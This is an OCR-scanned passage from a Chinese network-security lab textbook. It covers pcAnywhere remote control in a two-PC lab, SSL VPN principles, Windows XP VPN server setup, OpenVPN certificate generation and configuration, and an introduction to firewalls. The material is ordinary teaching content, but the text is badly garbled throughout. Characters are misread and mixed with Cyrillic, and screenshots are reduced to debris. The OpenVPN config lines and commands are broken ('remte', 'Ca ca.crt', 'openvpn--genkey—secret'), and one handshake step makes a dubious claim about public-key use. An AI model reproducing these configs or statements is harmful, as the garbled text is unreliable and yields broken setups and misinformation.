

图 421 远程 连接 显示 


控制 界面 如 图 4. 22 所 示 , 连 接 成 功 后 将 按 要 求 进入 远程 操作 界面 或 者 文件 传输 界 
面 ,可 以 在 远程 操作 界面 中 遥控 被 控 计 算 机 。 

实验 报告 要 求 

。 实 验 目 的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 

* 阐述 碰 到 的 问题 以 及 解决 方法 。 
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图 42 远程 控制 界面 


。 阐述 收获 与 体会 
4.3 扩展 实验 


实验 器 材 

。 pcAnywhere 软件 系统 1 E., 

e PC( Windows XP/Windows 7)1 台 。 

预习 要 求 

。 做 好 实验 预习 ,复习 远程 控制 技术 的 有 关内 容 。 

。 复习 pcAnywhere 软件 的 操作 方法 。 

。 熟悉 实验 过 程 和 基本 操作 流程 。 

。 做 好 预习 报告 。 

实验 任务 

利用 pcAnywhere 软件 对 远程 计算 机 进行 控制 。 

实验 环境 

安装 Windows 系统 .pcAnywhere 软件 (包含 被 控 端 和 主 控 端 ) ,两 台 局 域 网 PC, 
任务 一 : 从 机 (被 控 端 ) 的 pcAnywhere 基本 配置 

CD 通信 双方 中 ,一 方 为 “ 主 控 端 "(主机 ), 男 一 方 为 “被 控 端 "(从 机 )。 

(2) 启动 从 机 的 pcAnywhere, 在 工具 栏 单 击 “ 被 控 端 ", 青 右 击 工作 区 的 “NETWORK， 


CABLE,DSL” 选 项 ,选择 “属性 ”。 其 中 ,默认 协议 设 为 TCP/IP, 不 要 更 改 。 
G) 选择 “呼叫 者 ”, 在 “验证 类 型 ”下 拉 列 表 中 选择 pcAnywhere, 右 击 呼叫 者 列表 , 选 
择 新 建 。 
(4) 输入 新 建 用 户 的 登录 名 和 密码 (主机 呼叫 从 机 时 用 到 ), 只 有 拥有 此 登录 名 和 密 
码 的 主机 才能 呼叫 并 控制 从 机 。 系 统 默 认 的 权限 是 主机 可 完全 控制 。 
G) 修改 被 控 端 的 用 户 登录 密码 ,修改 部 分 系统 环境 。 
任务 二 : 主机 ( 主 控 端 ) 的 pcAnywhere 基本 配置 
(1) 启动 从 机 的 pcAnywhere, 在 工具 栏 单 击 “ 主 控 端 ", 青 右 击 工作 区 的 “NETWORK， 
CABLE,DSL? 选 项 ,选择 “属性 ”。 其 中 ,默认 协议 设 为 TCP/ 卫 ,不 要 更 改 。 
(2) 选择 “设置 ” ,在 “控制 的 网 络 被 控 端 PC 或 IP 地 址 CN): ”后 输入 从 机 的 TP 地 址 
并 单 击 “ 确 定 ” 按 钮 。 
任务 三 : 远程 控制 的 实施 
(D 运行 从 机 的 pcAnywhere, 选 择 “ 被 控 端 *, 双击“NETWORK,CABLE,DSL”, 表 
示 从 机 现在 处 于 等 待 状态 ,随时 接受 主机 的 “呼叫 ”。 
(2) 运行 主机 的 pcAnywhere. ,选择 “ 主 控 端 ”, 双 击 “NETWORK,CABLE,DSL”, 程 
序 执行 结果 因 任务 二 中 步骤 (2) 的 设置 分 两 种 : 
© 若 步骤 (2) 中 未 设置 从 机 的 IP 地 址 , 则 * 主 控 端 > 自动 扫描 所 有 “等 待 连接 ”的 
从 机 。 
* 若 步 又 (2) 中 设置 了 从 机 的 TP 地 址 , 则 显示 登录 信息 ,只 要 用 户 名 和 密码 通过 从 
机 的 验证 ,主机 就 可 顺利 取得 对 从 机 的 控制 权 , 同 时 在 主机 屏幕 中 显示 从 机 的 
桌面 。 
任务 四 : 在 主机 上 对 从 机 进行 操纵 
d) 单 击 工具 栏 中 的 “ 改 为 全 屏 显示 ”按钮 ,可 全 屏 显 示 从 机 的 桌面 而 隐藏 主机 的 “ 开 
始 ” 菜 单 和 “任务 栏 ”。 
(2) 单 击 工具 栏 中 的 “文件 传输 ”按钮 ,左边 显示 的 是 主机 资源 ,右边 显示 的 是 从 机 资 
源 ,利用 鼠标 的 拖 放 功能 可 实现 文件 的 双 机 互 拷贝 。 
(3) 单 击 工具 栏 中 的 “查看 修改 联机 选项 ?按钮 ,设置 锁定 从 机 键盘 , 单 击 工 具 栏 中 的 
“结束 远程 控制 对 话 ” 按 钮 。 
实验 报告 要 求 
。 实验 目的 。 
* 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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第 5 7 SSL VPN 实验 


5.1 SSL VPN 原理 


5.1.1 基本 概念 


随 着 计算 机 网 络 技术 和 信息 技术 的 发 展 与 应 用 , 越 来 越 多 的 用 户 希 望 能 在 非 正式 办 
公 场 所 享受 到 单位 内 部 网 络 的 权限 和 服务 ,虚拟 专用 网 (virtual private network, VPN) 
是 目前 解决 这 一 问题 的 有 效 办 法 。 虚 拟 专用 网 通过 私有 的 隧道 技术 在 公共 数据 网 络 上 仿 
真一 条 点 到 点 的 专线 技术 。 所 谓 虚 拟 ,是 指 用 户 不 再 需要 拥有 实际 的 长 途 数 据 线 路 ,而 是 
使 用 Internet 公众 数据 网 络 的 长 途 数据 线路 。 所 谓 专 用 网 络 , 是 指 用 户 可 以 为 自己 制定 
一 个 符合 自己 需求 的 网 络 。 利 用 VPN 技术 构建 安全 的 虚拟 私有 网 络 , 节 省 了 租用 专线 
的 费用 。 

VPN 技术 具有 以 下 优势 : 

СТ) 跨 地 域 的 分 支 机 构 网 络 互 联 互通 ,构建 远程 "局 域 网 ”, 实 验资 源 共 享 。 

(2) 降低 网 络 通信 成 本 ,替代 昂贵 专线 。 

(3) 信息 流畅 通 , 提 高 效率 ,业务 系统 实时 信息 共享 。 

(4) 随时 随地 移动 办 公 , 安 全 接 入 单位 网 络 。 

VPN 技术 提供 了 以 下 功能 : 

(1) 用 户 验证 。 验 证 用 户 身 份 并 严格 控制 只 有 授权 用 户 才能 访问 VPN。 

(2) 地 址 管理 。 能 够 为 用 户 分 配 专 用 网 络 上 的 地 址 并 确保 地 址 的 安全 性 。 

(з) 数据 加 密 。 数 据 经 过 加 密 , 确 保 网 络 其 他 未 授权 用 户 无 法 读 取 该 信息 。 

(4) 密 钥 管理 。 能 够 生成 并 更 新 客户 端 和 服务 器 的 加 密 密 钥 。 

(5) 多 协议 支持 。 支 持 公 共 互 联网 络 上 普遍 使 用 的 基本 协议 ,包括 IP、IPX 等 。 

VPN 主要 包括 4 项 技术 : 

CD 隧道 技术 (tunneling): 隧道 是 在 公 网 上 传递 私有 数据 的 一 种 方式 ,也 是 数据 包 
在 网 络 中 传输 经 过 的 逻辑 路 径 。 

(2) 加 解密 技术 (encryption & decryption) : 保证 数据 传输 过 程 中 的 安全 。 

(3) 密 钥 管 理 技术 (key management) 。 

(4) 使 用 者 与 设备 身份 认证 技术 Cauthentication): 保证 VPN 通信 方 的 身份 确认 及 
合法 。 
目前 ,常用 的 VPN 技术 主要 有 三 种 : IPSEC (Internet protocol security), SSL 
(secure socket layer) .MPLS(multiProtocol label switch) (电信 和 运营 商 提供 )。 


5.1.2 SSL VPN 


将 安全 套 接 层 协 议 (secure socket layer. SSL) fll VPN 组合, 称 为 基于 SSL 的 VPN. 
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简称 SSL VPN. SSL VPN 作为 一 种 价格 便宜 、 安 装 方便 同时 具有 完善 的 远程 访问 功能 
的 安全 方案 ,在 保险 业 、 银 行 、 金 融 、 证 券 行业 、 电 信行 业 的 无 线 网 络 等 方面 的 应 用 越 来 越 
广泛 。 安 全 性 是 SSL VPN 的 一 个 重要 特性 , 它 也 是 设计 和 维护 的 重点 内 容 。 

SSL 协议 是 网 景 公 司 设计 的 基于 Web 应 用 的 安全 协议 , 它 指定 了 在 应 用 程序 协议 
(如 HTTP、Telnet 和 FTP ^) #1 TCP/IP 协议 之 间 进 行 数据 交换 的 安全 机 制 ,为 TCP / 
IP 连接 提供 数据 加 密 、 服 务 器 认证 以 及 可 选 的 客户 机 认证 。SSL 协议 是 由 SSL 记录 协 
议 .握手 协议 、 密 钥 更 改 协 议和 告警 协议 组 成 ,它们 共同 为 应 用 访问 连接 提供 认证 .加 密 和 
防 算 改 等 功能 。 其 工作 流程 如 图 5. 1 所 示 。 


Step 1 Client Requests Secure Information 
| > 


Step 2 Server Requests Secure Session 


Client | 


Servi 
Step 3 Client Sends Security Parameters с 


| > 
э 
Step 4 Server Sends Digital Certificate = 


Step 5 Client Generates Session Key 
Encrypted with Server’s Public Key 


| > 


4 Step 6 Symmetric Key is Used to Encrypt the Data » 


图 51 SS VPN 工作 流程 


SSL VPN 的 一 般 实 现 方式 是 在 企业 的 防火 墙 后 面 放 置 一 个 SSL 代理 服务 器 ，SSL 
代理 服务 器 将 提供 一 个 远程 用 户 与 各 种 不 同 的 应 用 服务 器 之 间 的 连接 ,主要 有 握手 协议 、 
记录 协议 .警告 协议 的 通信 。SSL VPN 的 通信 过 程 主要 集中 在 握手 协议 上 ,过程 如 下 : 

(1) SSL 客户 机 连接 到 SSL 服务 器 ,并 要 求 服务 器 验证 身份 。 

(2) 服务 器 发 送 数 字 证 书证 明 自 身 的 身份 。 这 个 交换 包括 整个 证 书 链 , 直 到 某 个 证 
书 颁发 机 构 (CA) 通 过 检查 有 效 日 期 并 确认 证 书包 含 可 信任 CA 的 数字 签名 来 验证 证 书 
的 有 效 性 。 

(3) 服务 器 发 出 一 个 请 求 ,对 客户 端的 证 书 进行 验证 。 

(4) 双方 协商 加 密 算法 和 用 于 完整 性 检查 的 Hash 函数 ,通常 由 客户 端 提供 它 所 支 
持 的 所 有 算法 列表 ,然后 由 服务 器 选择 其 中 最 健壮 的 加 密 算法 。 

G) 客户 机 和 服务 器 通过 下 列 步骤 生成 会 话 密 钥 : 

CD 客户 机 生成 一 个 随机 数 , 并 使 用 服务 器 的 公 钥 对 它 加 密 ,再 送 到 服务 器 。 

O 服务 器 用 客户 机 的 公 钥 加 密 ,发 送 至 客户 机 以 表示 响应 。 

© 使 用 Hash 函数 从 随机 数据 中 生成 密 钥 。 

SSL VPN 技术 的 主要 特点 如 下 : 

。 客户 端 维护 简单 。 

。 提供 增强 的 远程 安全 接 人 功能 。 

。 提供 更 细 粒 度 的 访问 控制 。 
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。 能够 穿越 防火 墙 等 设备 。 

。 能 够 较 好 地 抵御 外 部 病毒 攻击 。 

。 网 络 部 署 方便 灵活 。 

SSL VPN 的 四 种 工作 模式 如 下 。 

CD 代理 : HTTP proxy. 

(2) 应 用 转换 : 把 C/S 应 用 客户 端 转化 成 Web 方式 。 
(3) 端口 转发 : 对 任意 的 C/S 应 用 实现 SSL 保护 。 
(4) 网 络 连接 (NC mode): 用 SSL 实现 网 络 层 的 连接 。 


5.2 VPN 配置 实验 


实验 器 材 
* PC(Windows XP/Windows 7)1 £i. 


预习 要 求 

。 做 好 实验 预习 ,复习 VPN 及 隧道 技术 的 有 关内 容 。 

。 复习 Windows 操作 系统 的 网 络 设置 方法 。 

。 做 好 预习 报告 。 

实验 任务 

通过 本 实验 ,掌握 VPN 服务 器 搭建 技术 。 

实验 环境 

装 有 Windows XP 操作 系统 的 PC。 

预备 知识 

。 VPN 技术 及 原理 。 

。 隧道 技术 。 

实验 步骤 

1. 基础 环境 配置 

开启 Windows XP 系统 自 带 的 防火 墙 系 统 (Windows firewall/Internet connection 
sharing(ICS))( 需 要 允许 1723 端口 通过 ) 。 

必须 开启 的 服务 包括 远程 注册 表 服 务 (Remote Registry) , Server 服务 (Server) 、 
Router 路 由 服务 (Routing and Remote Access) ,如 图 5. 2 所 示 。 

2. 启动 系统 服务 

默认 情况 下 所 需 服务 中 ,远程 注册 表 服 务 (Remote Registry) 和 Server 服务 (Server) 
是 自动 启动 的 ,只 有 Router 路 由 服务 (Routing and Remote Access) 默 认 禁 止 。 右 击 桌面 
上 的 “我 的 电脑 ”, 选 择 “ 管 理 ” 选 项 ,进入 “计算 机 管理 ”后 , 单 击 左 侧 的 “服务 和 应 用 程序 ”， 


选择 “服务 ”选项 ,如 图 5. 2 所 示 ,在 右 侧 找到 Routing and Remote Access, 右 击 , 选 择 “ 属 
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EN | 状态 | 启动 类 型 | 

Office Source Engine 本 地 系统 
|S Performance Logs and Alerts 网 络 服务 | 
(Plug and Play : 本 地 系统 | 
[Sy Portable Media Serial Number Service Retrie... 本 地 系统 | 
[SyPrint Spooler 将 文件 本 地 系统 
Sy Protected Storage 提供 对 . . 本 地 系统 
[aos RSVP E: 本 地 系统 
[Sy Remote Access Auto Connection Manager ЖЖ... 手动 本 地 系统 
[Sy Remote Access Connection Manager ABLA. 已 启动 手动 本 地 系统 
fü Renote Desktop Help Session Manager 管理 并 手动 本 地 系统 
[aRenote Procedure Call (RPC) 提供 终 . .已 启动 ”自动 网 络 服务 | 
[Renote Procedure Call (RPC) Locator SER 手动 网 络 服务 | 
[Sy Remote Registry хе 已 禁用 本 地 服务 
|S Removable Storage 已 茜 | 本 地 系统 

Routing and Remot egi t 了 已 禁用 本 地 系统 
|б Secondary Logon BRE 已 启动 自动 本 地 系统 
Security Accounts 存储 本 已 启动 自动 本 地 系统 
[Ry Security Center ENR 已 禁用 本 地 系统 
[Sty Server 支持 此 ... 已 启动 自动 本 地 系统 
|S ServiceLayer 重新 局 动 E) 手动 本 地 系统 
[aShell Hardware Det oe p 为 自动 已 禁用 本 地 系统 
аса Card ЕБ ?| 管理 此 手动 本 地 服务 | 
[ 551? Discovery Ser BIS C) 启动 您 已 启动 手动 本 地 服务 | 
| 号 systan Event Noti fe E 跟踪 系 已 启动 自动 本 地 系统 
[Ry Systen Restore Se 执行 系 已 禁用 本 地 系统 | 
|S Task Scheduler 使 用 户 已 禁用 本 地 系统 
|S) TCP/IP NetBIOS Help RFN... 手动 本 地 服务 | 
|S Telephony 提供 T 已 启动 手动 本 地 系统 
{Sy Telnet tin. 已 禁用 本 地 系统 
Kin Terminal Services 允许 多 已 禁用 本 地 系统 


图 52 系统 服务 界面 


性 ”选项 ,更 改 “ 启 动 类 型 "为 “自动 ”, 然 后 单 击 “确定 ”按钮 。 所 有 设置 完成 后 , 右 击 
Routing and Remote Access. "ftd; “Ja zh” TEIL. 

右 击 “ 网 上 邻居 ”, 选 择 “ 属 性 ?选项 ,进入 "网 络 连 接 ”, 会 发 现 增加 了 一 个 “传人 的 连 
接 ”, 如 图 5.3 所 示 。 


XHKO S: ЖЕО) 收藏 (A) ТАС) 高 级 (N) 帮助 (H) 


Оз. O- B Px ose m 


图 53 传 入 的 连接 界面 
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右 击 “ 传 人 的 连接 ”, 选择 “属性 ”选项 ,在 “常规 ”选项 卡 中 ,选中 “允许 他 人 通过 
Internet 或 其 他 网 络 以 “隧道 操作 ”方式 建立 到 我 的 计算 机 的 专用 连接 (W)” 复 选 框 ,如 
图 5.4 所 示 。 

单 击 “ 用 户 ” 选 项 卡 , 单 击 下 面 的 “新 建 (N)...” 按 钮 建立 一 个 用 户 名 和 密码 ,也 可 以 选 
中 已 有 的 用 户 名 和 密码 。 到 “网 络 ” 选 项 卡 中 , 单 击 “ 安 装 (1)... ”按钮 ,在 “协议 ”选择 包含 
NWLink IPX/SX/NetBIOS 协议 ”后 , 单 击 “ 确 定 ” 按 钮 ,如 图 5. 5 所 示 。 


D AMER 属性 


жй [aP | 网 络 
传 和 的 
Snes evenoe 


S eS 


选择 网 络 协议 


E a eee 
Cameo) 


SAL = dem 
EE QD 


rm — 网 络 协议 : 
Microsoft EJ neteork Monitor Drive 
NWLink IPX/ 


SPX/NetBIOS Compatible Tran 


Аа] 


=i 2, E: 
Бу 这 个 驱动 程序 已 经 过 数字 签署 ， 
省 诉 我 为 什么 驱动 程序 签名 很 重要 


从 磁盘 安装 OD. . 


Ce Ca 
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图 55 协议 安装 界面 
如 果 VPN 服务 器 所 在 的 网 络 没 有 开启 自动 获取 IP 地 址 (DHCP), 则 需要 配置 传人 
连接 的 IP 范围 ,双击 “Internet 协议 (TCP/IP)”, 在 弹出 的 窗口 中 选择 “指定 TCP/IP 地 
址 ”, 并 填写 与 VPN 服务 器 同一 网 段 的 空闲 地 址 ,推荐 为 双 数 , 如 图 5. 6 所 示 
传 入 的 TCP/IP ЕЕ 
厂 网 络 访问 
Iv. 允许 呼叫 方 访问 我 的 局 域 网 人 ) 
ГТСР/ТР 地 址 指派 
C 用 онр 自动 指派 TCP/IP Hii (А) 
© 指定 TCP/IP Heit Œ) 


Aq: 192. 168. 1 . 100 
3l: 192.168. 1 . 200 
Sit: for 


厂 区 许 呼叫 的 计算 机 指定 其 IP 地 址 QD 


m um ws | 


图 56 IP 地 址 范围 设置 界面 
3. 客户 端 ( 接 入 端 ) 的 相关 配置 


打开 “网 络 连 接 ”, 单 击 左 侧 “ 网 络 任务 ”下 的 “创建 一 个 新 的 连接 ”"。 在 打开 的 “新 建 连 
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接 向 导 ” 中 单 击 “ 下 一 步 ” 按 钮 ,“ 网 络 连接 类 型 "选择 “连接 到 我 的 工作 场所 的 网 络 ”; 单 击 
“下 一 步 ” 按 钮 ,选择 “虚拟 专用 网 络 连 接 ”; 单 击 " 下 一 步 ”按钮 ,填写 “公司 名 ”, 可 以 留 空 不 
写 ( 留 空 为 : 虚拟 专用 网 络 ); 单 击 “ 下 一 步 ”按钮 ,填写 VPN 服务 器 的 IP 地 址 或 域名 ,如 
图 5.7 所 示 ; 单 击 “ 下 一 步 ”按钮 ,在 出 现 的 完成 页 面 中 单 击 “完成 ”按钮 。 

新 建 连接 向 导 


хри 服务 器 选择 = 
vex RS SED Stet д7 e) 


输入 您 正 连接 的 计算 机 的 主机 名 或 IP 地 址 。 


EE IPH (PURO » microsoft. com 或 157.54.0.1) QD: 


图 57 VFN 服务 器 的 IP 地 址 设置 界面 


4. VPN 使 用 设置 

打开 刚刚 创建 好 的 连接 ,输入 允许 接 入 的 用 户 名 和 密码 , 单 击 “ 连 接 ” 按 钮 ,客户 机 成 
IFRA VPN 服务 器 。 通 过 查看 连接 属性 ,可 以 看 到 时 间 、 流 量 等 信息 ,如 图 5. 8 所 示 。 

使 用 XP 系统 做 VPN 服务 器 只 能 同时 允许 一 个 用 户 接 入 ,如 果 有 其 他 用 户 接 入 ,会 
出 现 如 图 5.9 所 示 错 误 。 


элыш АУ. 
юкны В, SALLE ASR 


fk 
B 
压缩 a 
л 
RSS IP Hi 169.254. 18. 198 
EPR IP Hil 169. 254. 38. 86 Oemasiere 


关于 日 志 记录 选项 ， 请 看 诊断 


Еее mar яа 


图 58 VPN 连接 属性 图 59 连接 错误 提示 


实验 报告 要 求 

: 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 碰 到 的 问题 以 及 解决 方法 。 
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。 阐述 收获 与 体会 。 


思考 题 
为 什么 要 添加 “NWLink IPX 协议 ”? 


5.3 SSL VPN 配置 实验 


实验 器 材 
。 OpenVPN 软件 系统 1 套 。 
* PC(Windows XP/Windows 7)1 台 。 
预习 要 求 
。 做 好 实验 预习 ,复习 SSL VPN 的 有 关内 容 。 
。 复习 OpenVPN 的 使 用 方法 。 
。 熟悉 实验 过 程 和 基本 操作 流程 。 
。 做 好 预习 报告 。 
实验 任务 
通过 本 实验 ,掌握 VPN 服务 器 搭建 技术 。 
实验 环境 
RA Windows 7 操作 系统 的 PC. 
预备 知识 
。 VPN 技术 及 原理 。 
。 隧道 技术 。 
KEDR 
1. 服务 器 端 配置 
需要 注意 的 是 : 在 Client 端 和 Server 端 需要 使 用 相同 版 本 的 Open VPN ,本 实验 使 
用 的 软件 版 本 是 OpenVPN 2. 1.4。 在 Windows 7 操作 系统 下 采取 默认 安装 ,直至 完成 
即 可 ,如 图 5. 10 所 示 ,安装 目录 为 C:\Program Files\OpenVPN. 
具体 配置 工作 如 下 。 
(1) 修改 easy-rsa 目录 下 的 vars. bat. sample 内 容 ,用 写字 板 打 开 , 并 将 其 改名 为 
vars. bat。 原 内 容 如 下 : 
* set KEY_COUNTRY=US 
* set KEY_PROVINCE=CA 
* set KEY_CITY=SanFrancisco 
* set KEY_ORG=OpenVPN 
* set KEY_EMAIL=mail@host. domain 
根据 自身 情况 修改 ,也 可 以 不 修改 。 可 以 改 为 : 
* set НОМЕ= С:\Рговгат Files\OPENVPN\easy-rsa // 新 增 
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[0 OpenVPN 214 Setup c Б (ers 
(DPENVPN "ааа, 


Completed 
— M Ó—— à 


Create shortcut: C: Users weizhenghui AppData Roaming Microsoft Windows Start... | = 
Create shortcut: C: Users weizhenghuilDesktoplOpenVPN GUI.Ink 

Create shortcut: C: Users weizhenghui WppData Roaming Microsoft Windows Start ... 
Create shortcut: C:\Users \weizhenghui MppData Roaming Microsoft Windows Start ... 
Create shortcut: C: Users weizhenghui \AppData Roaming Microsoft Windows Start ... 
Create shortcut: C:\Users \weizhenghui \AppData Roaming Microsoft Windows Start ... 
Create shortcut: C: Users \weizhenghui \AppData Roaming Microsoft Windows (start .. 
Create shortcut: C:\Users \weizhenghui AppData Roaming Microsoft Windows Start ... 
Created uninstaller: C:\Program Files\OpenVPN\Uninstall.exe E| 
Completed 3 


图 510 OperMRN 安 装 界面 
* set KEY_COUNTRY=CN /( 国 家 ) 
* set KEY_PROVINCE=HL]J / C8 5 
* set KEY CITY -—hrbeu (城市 ) 
* set KEY_ORG=OpenVPN // C8 ZR 
e set KEY EMAIL — mail(? host. domain '/( 邮 件 地 址 ) 


(2) 把 C; \ Program Files \ OpenVPN \ easy-rsa 中 的 openssl. cnf. sample 改 为 
openssl. cnf。 在 DOS 环境 下 运行 : 进入 目录 C:\Program Files\OpenVPN\easy-rsa. 4) 
别 输入 vars 和 clean-all. bat 命令 。 


(3) 生成 根 CA ,输入 命令 : build-ca. bat, 如 图 5. 11 所 示 。 


ing a 1024 bit 


enter information that will be i 


à Distinguished N 


> quite a fe you can le ome blank 


^ some fields th 11 a default « У 
enter '.', the field will be left blank. 


"y Name (2 letter code) [CN]: 


图 511 bildcabt 运行 界面 


输入 系统 环境 信息 和 服务 器 基本 信息 ,包括 组 织 结构 名 称 、 国 家 、 服 务 器 名 称 、 使 用 者 
信息 等 内 容 ,如 图 5. 12 所 示 。 

输入 : build-dh. bat ,完成 基本 设置 ,如 图 5. 13 所 示 。 

(4) 生成 服务 器 端 证 书 、 客 户 端 证 书 、TA 证 书 。 服 务 器 端 证 书 、TA 证 书 必须 生成 在 
服务 器 端 机 器 上 ;客户 端 证 书 、TA 证 书 必须 生成 在 客户 端 机 器 上 。 首 先 ,生成 服务 器 端 
Server 使 用 的 证 书 ,输入 命令 :build-key-server. bat server, 如 图 5. 14 所 示 。 

* 108 • 


letter code) [CN]:CN 


nUPN 
group 
group 


^ 
2 
N 
E: 
R 
E 
> 
Dir 
an 
Ei 
me 
38 
E 


513 bidha 运行 界面 


OpenUPN\eas y-rsa?build-key. 
into random ^ 一 done 


RSA pri 


t to be asked to r information that will be incorporated 
ificate request. 
bout to enter i is called a Distinguished Name or a DN. 


e quite a few field ч can leave some blank 
fields there will be a default value 
you enter ’.’, the field will be left blank 


Zountry Name (2 letter code) [CN]: 


图 514 buld-key-server.bat 运行 界面 


输入 必要 的 注册 信息 : An optional company name []:wyzz, 这 些 信 息 都 是 之 前 定义 
好 的 ,密码 处 留 空 , 以 后 可 以 进行 设置 ,如 图 5. 15 所 示 。 最 后 出 现 提示 信息 “Sign the 
certificate ? [y/n]”, 输 入 : у. 

生成 Client 证 书 , 输 入 命令 : C:\Program Files\OpenVPN\ea 
client ,如 图 5. 16 所 示 。 

如 前 所 述 ,输入 必要 的 注册 信息 。 密 码 同 样 留 空 不 写 , 输 入 : wyzz, 最 后 出 现 提示 信 
息 “Sign the certificate? [y/nj”, 输 入 : y. 

完成 ta. key 文件 的 生成 , 即 C:\Program Files \ OpenVPN \ easy-rsa > openvpn-- 
genkey—secret keys/ta. key. PRA AY HE CA、 服务器、 客户 端 所 需 证 书 和 密 钥 文件 准备 就 
绪 后 ,设置 配置 文件 。 利 用 build-key client2 可 以 继续 配置 第 二 个 VPN 客户 端 密 钥 , 配 


y-rsa> build-key. bat 
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55 注册 信息 界面 


ill be 
field will be 


(2 letter code? 


build-key.bat client 


- done 


client .key’ 


enter information that will be incorporated 
called 
ч са 1 е 
a default alue, 


left blank 


a Distinguished Name a DN. 


bla 


what i 


but some 
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图 516 buld-key.ba 运行 界面 


G) 服务 器 端 配置 。 服 务 器 的 配置 文件 在 C:\ProgramFiles\OpenVPN\sample- 
config 中 。server. ovpn 内 容 如 下 : 


port 1194 //1194 端 口 进行 通信 
;proto tcp 

proto udp 

dev tap // 虚 拟 设 备 型 号 
dev tun 


7dev- node Мутар 

Ca ca.crt 

cert server.crt 

key server.key # This file should be kept secret 
dh dh1024.pem 

// 服 务 器 端 要 用 的 证 书 

server 10.8.0.0 255.255.255.0 

// 服 务 网 关 的 虚拟 网 段 


将 生成 的 ca. crt dh1024. рет server. crt, server. key 和 配置 文件 server. ovpn 复制 

到 C:\Program Files\OpenVPN\config 目录 下 ,这 五 个 文件 是 VPN 服务 器 端 运行 所 必 
需 的 文件 。 
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(6) 客户 端 文件 配置 。 客 户 端 client. ovpn 的 配置 文件 在 C:\ProgramFiles\OpenVPN\ 
sample-config. client. ovpn 内 容 中 : 


remte my- server- 1 1194 
;remte my- server- 2 1194 


更 改 如 下 : 


remote 192.168.1.233 1194 
;remote 192.168.1.233 1194 


客户 端 所 需 证 书 及 其 密 钥 ; 


# file can be used for all 

ca ca.crt 

cert client.crt 

key client .key 

将 生成 的 ca. crt. client. ert, client. key. ta. key 和 配置 文件 client. ovpn 复制 到 C:N 
Program Files\OpenVPN\config 目录 下 ,这 五 个 文件 是 VPN 客户 端 运行 所 必需 的 文件 。 
配置 结束 ,在 右 下 角 会 有 图 标 显示 ,红色 为 未 连接 ,黄色 为 等 待 连接 ,绿色 为 连接 成 功 。 

2. 客户 端 连接 设置 

(1) Server 端 配置 : 双击 系统 的 “控制 面板 ”, 选 择 “ 网 络 ” 选 项 ,再 选择 “Internet\ 网 络 
连接 ?选项 ,如 图 5. 17 所 示 。 


e 
e- 


mmen | 查看 基本 网 络 信息 并 设置 连接 


WEIZHENGHU.- 多 重 网 络 Internet 
计算 机 ) 


BEE. Us. ES. Marino VPN 连接 ; 或 设置 路 由 器 
或 访问 点 . 


= 连接 到 网 络 
连接 到 或 重新 连接 到 无 线 、 有 线 、 援 号 或 VPN 网 络 连接 。 


а 57 系统 网 络 连接 界面 


按 Alt 键 ,会 出 现 “ 文 件 ” 等 菜单 栏 ,选择 “文件 ”|“ 新 建 传 人 连接 ”命令 ,添加 用 户 。 为 
客户 端 输入 用 户 名 和 密码 等 信息 ,如 图 5. 18 Bron. 
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图 518 添加 用 户 界面 


单 击 “ 下 一 步 " 按 钮 ,选择 “通过 Internet”, 单 击 “ 允 许 访问 ”。 创 建 连接 ,为 客户 端 授 
权 即 可 。 设 置 结束 后 ,在 网 络 连接 中 会 出 现 新 接 人 的 连接 图 标 。 

(2) Client 端 配置 : 双击 “控制 面板 ”, 选 择 “ 网 络 ”, 进 入 “Internet\ 网 络 连 接 ” 界 面 , 设 
置 新 的 链接 或 网 络 。 选 择 “ 连 接 到 工作 区 ”。 在 "你 想 如 何 连接 ?选项 中 选择 首 项 “是 我 的 
Internet 连接 (VPN)”。 

TE Internet 地 址 中 填 入 Server 端 IP 地 址 ,如 图 5. 19 所 示 , 填 入 授权 的 用 户 名 和 密 
码 , 即 先期 创建 的 账号 和 密码 。 


键入 要 连接 的 Internet 地 址 


网 络 管理 员 可 提供 此 地 址 . 


Internet 地 址 (D): [##Коновосот 或 157.54.0.1 3#е:1234:1111] 


目标 名 称 (E): VPN 连接 


图 5 人 客户 端 配置 界面 
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实验 报告 要 求 
。 阐述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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6.1 防火 墙 技术 


防火 墙 是 一 类 防范 措施 的 总 称 。 所 谓 “ 防 火 墙 ", 是 指 一 种 将 内 联网 和 公众 访问 网 (外 
联网 Internet) 分 开 的 方法 , 它 使 得 内 联网 与 外 联网 互相 隔离 ,限制 网 络 互 访 来 保护 内 部 
网 络 。 它 是 一 个 或 一 组 由 软件 和 硬件 构成 的 系统 ,在 两 个 网 络 通信 时 执行 的 一 种 访问 控 
制 尺度 ,防止 重要 信息 被 更 改 、 复 制 、 毁 坏 。 设 置 防火 墙 的 目的 是 为 了 在 内 部 网 与 外 部 网 
之 间 设 立 唯一 的 通道 ,简化 网 络 的 安全 管理 。 


6.1.1 基本 概念 


防火 墙 是 一 个 网 络 安全 专用 词 , 它 是 在 内 部 网 (或 局 域 网 ) 和 互联 网 之 间 ,或 者 是 内 部 
网 的 各 部 分 之 间 实 施 安全 防护 的 系统 ,通常 由 硬件 设备 (路 由 器 网关、 堡垒 主机 、 代 理 服 
务 器 ) 和 防护 软件 等 共同 组 成 。 在 网 络 中 它 可 对 信息 进行 分 析 、 隔 离 .限制 ,从 而 保护 网 络 
安全 运行 。 

防火 墙 的 体系 结构 主要 包括 如 下 几 个 部 分 。 

CD 屏蔽 路 由 器 (screening router) : 它 是 防火 墙 最 基本 的 构件 ,可 以 由 路 由 器 实现 ， 
也 可 以 用 主机 实现 。 屏 蔽 路 由 器 作为 内 外 连接 的 唯一 通道 ,要 求 所 有 报 文 都 必须 在 此 通 
过 检查 。 

(2) 双 穴 主 机 网 关 (dual homed gateway) ; 这 种 配置 是 用 一 台 装 有 两 块 网 卡 的 堡垒 
主机 做 防火 墙 。 其 两 块 网 卡 各 自 与 受 保护 网 和 外 部 网 相连 ,其 防火 墙 软件 可 以 转发 应 用 
程序 .提供 服务 等 。 

(3) 被 屏蔽 主机 网 关 (screened host gateway); 屏蔽 主机 网 关 易 于 实现 也 很 安全 ,应 
用 广泛 。 网 关 的 基本 控制 策略 由 安装 在 上 面 的 软件 决定 。 

(4) 被 屏蔽 子 网 (screened subnet) : 这 种 方法 是 在 内 部 网 络 和 外 部 网 络 之 间 建 立 一 
